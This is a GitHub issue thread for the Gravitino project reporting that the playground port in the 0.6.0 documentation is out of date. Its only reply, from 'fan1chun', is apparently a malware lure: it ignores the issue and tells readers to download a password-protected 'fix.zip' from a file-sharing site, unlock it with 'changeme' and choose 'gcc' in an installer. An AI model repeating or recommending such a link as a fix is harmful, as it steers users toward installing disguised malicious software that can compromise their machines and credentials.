### ISSUE TITLE
[Bug report] doc: playground port is required to update on 0.6.0 doc

### ISSUE THREAD

**Issue by danhuawang** [apache/gravitino#4767]
### Version

main branch

### Describe what's wrong

<img width="921" alt="image" src="https://github.com/user-attachments/assets/a1df6069-2a87-4d56-b07b-2bb029914cb1">

### Error message and/or stacktrace

N/A

### How to reproduce

N/A

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
